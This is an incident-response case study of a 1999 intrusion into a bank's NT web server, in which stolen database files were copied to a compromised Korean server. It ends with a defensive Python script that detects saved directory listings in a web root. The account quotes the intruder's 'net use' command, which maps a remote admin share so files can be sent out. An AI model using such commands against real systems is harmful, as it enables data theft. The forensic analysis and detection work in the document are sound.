East Asian Bank. Time: December 1999. The website runs Windows NT 4.0 and belongs to one of the largest banks in the country. The web server, BankServer, actually sits behind two lines of defence. First, the access control list (ACL) on its router applies strict port filtering and only allows inbound access to ports 80, 443 and 65300. Second, it runs FW, the software firewall with the largest market share worldwide, which besides port access control also blocks illegal calls to known CGI bugs.

In December, YMOUSE, the system administrator of the bank's website, suddenly noticed a cmd.exe process in the task list, although no service on BankServer had anything to do with cmd.exe. The administrator turned for help to F, a technical member of a hacker chat room. F thought this looked like the typical sign of a compromised NT system. With authorization obtained by email, F began analysing the security of the system. From the outside, apart from the WWW service, BankServer exposed nothing else. F did, however, find a security problem in the site's upstream router that allowed an intruder to obtain the router's configuration file and crack its password. With YMOUSE's consent, it took F only 3 minutes to obtain the router's access password. After logging in to the router and a fair amount of analysis, F found that, although the bank website itself showed no hidden communication, BankServer was connected to port 139 of another NT server, Wserver. Further analysis confirmed that someone had logged in from BankServer to the C drive of Wserver. Wserver was a Korean NT server with no security protection at all. A simple scan of Wserver showed that the password of its administrator account was extremely simple, so full control of that system could be obtained easily. More surprisingly, on the C drive of this Korean server sat an important database file belonging to the East Asian bank mentioned above!

More files were still being transferred from BankServer to this Korean Wserver! The problem now had a preliminary outline. The intruder could execute NT shell commands on BankServer by some means (most likely through a vulnerability in the WWW service). Although the intruder could not log in to BankServer interactively and browse its hard drive directly, he had broken into another NT server, Wserver, and obtained its administrator account. Through the shell on BankServer, the intruder ran `net use * \\xxx.xxx.xxx.xxx\c$ passwd /user:"administrator"` to map Wserver's C drive to a drive letter on BankServer, then used the COPY command to transmit the important files on the system to Wserver. But since BankServer offered no login entry point, how did the intruder browse the file system on BankServer? How did he know which files were the important data files? To answer this, F asked YMOUSE to check the web directory on BankServer. YMOUSE found a suspicious ABC directory in the web directory. Every file in it was a text file, named x1.txt, x2.txt, x3.txt and so on. Checking them one by one showed that most had been generated by `DIR C:\ > X.TXT` and `DIR C:\DATA > X.TXT`. These files could be browsed at http://bankserver/abc/x.txt.
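One defensive check this finding suggests, added here as an example and not part of the original account: a small Python scanner that walks a web root and flags text files whose contents look like saved Windows `dir` output, the pattern of the ABC directory's x1.txt, x2.txt files above. The marker regexes, the constructed sample listing and the temporary web root are my assumptions, not artefacts from the incident.

```python
"""Flag text files under a web root that look like saved Windows `dir` output."""
import os
import re
import tempfile
from pathlib import Path

# Lines an NT 4.0 `dir` listing produces (assumption: English locale output).
DIR_MARKERS = [
    re.compile(r"^\s*Volume in drive [A-Z] ", re.I),
    re.compile(r"^\s*Directory of [A-Z]:\\", re.I),
    re.compile(r"\s<DIR>\s", re.I),
    re.compile(r"^\s*\d+ file\(s\)\s+[\d,]+ bytes", re.I),
]

def looks_like_dir_output(text: str, min_hits: int = 2) -> bool:
    """Return True when at least `min_hits` distinct dir-listing markers appear."""
    lines = text.splitlines()
    hits = sum(1 for pat in DIR_MARKERS if any(pat.search(ln) for ln in lines))
    return hits >= min_hits

def scan_webroot(webroot: str) -> list[str]:
    """Walk the web root and return relative paths of files that look like listings."""
    flagged = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = Path(dirpath) / name
            text = path.read_text(encoding="utf-8", errors="replace")
            if looks_like_dir_output(text):
                flagged.append(str(path.relative_to(webroot)).replace(os.sep, "/"))
    return sorted(flagged)

# Constructed sample, modelled on NT 4.0 `dir` output; file names are invented.
SAMPLE_LISTING = """ Volume in drive C has no label.
 Directory of C:\\DATA
12/05/99  10:21a        <DIR>          .
12/05/99  10:21a        <DIR>          ..
12/05/99  09:58a             4,194,304 accounts.mdb
               1 File(s)      4,194,304 bytes
"""

def demo() -> list[str]:
    """Build a constructed web root (abc/x1.txt, abc/x2.txt, index.html) and scan it."""
    root = tempfile.mkdtemp(prefix="webroot_")
    abc = Path(root) / "abc"
    abc.mkdir()
    (abc / "x1.txt").write_text(SAMPLE_LISTING)
    (abc / "x2.txt").write_text(SAMPLE_LISTING.replace("C:\\DATA", "C:\\"))
    (Path(root) / "index.html").write_text("<html><body>Welcome</body></html>\n")
    return scan_webroot(root)  # returns ['abc/x1.txt', 'abc/x2.txt']
```

Running `demo()` on the constructed tree flags only the two listing files; in practice the scan would run over the real web root on a schedule and alert on any hit.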